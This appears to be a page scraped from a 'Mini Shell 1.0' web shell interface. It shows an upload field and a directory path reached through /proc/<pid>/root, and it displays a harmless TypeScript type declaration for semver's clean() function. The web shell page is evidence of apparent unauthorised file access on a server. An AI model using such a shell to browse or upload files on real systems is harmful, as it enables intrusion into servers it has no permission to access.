HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1784574/root/usr/share/node_modules/@types/semver/functions/
Upload File :
Current File : //proc/1784574/root/usr/share/node_modules/@types/semver/functions/clean.d.ts
import semver = require('../index');

/**
 * Returns cleaned (removed leading/trailing whitespace, remove '=v' prefix) and parsed version, or null if version is invalid.
 */
declare function clean(version: string, optionsOrLoose?: boolean | semver.Options): string | null;

export = clean;